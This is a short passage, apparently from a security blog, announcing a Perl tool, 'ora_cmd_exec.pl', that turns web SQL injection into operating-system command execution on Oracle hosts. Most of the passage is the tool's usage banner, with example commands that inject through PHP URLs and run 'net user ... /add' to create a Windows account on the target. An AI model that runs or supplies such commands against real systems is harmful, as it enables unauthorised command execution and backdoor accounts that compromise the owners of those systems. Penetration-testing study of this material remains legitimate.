I wrote a small perl script to automate this process. The script 'ora_cmd_exec.pl' exploits web based SQL Injections and execute O.S commands on the Oracle host.
./ora_cmd_exec.pl
-----------------------------------------------------------------------
Oracle command execution via web apps
sid-at-NotSoSecure // notsosecure.com
suported versions
EXAMPLE: ./ora_cmd_exec.pl "192.168.172.129:81/ora3.php?name=s' " "net user notsosecure n0tsos3cur3 /add"
EXAMPLE: ./ora_cmd_exec.pl "192.168.172.129:81/ora3.php?id=100 " "net user notsosecure n0tsos3cur3 /add"
------------------------------------------------------------------------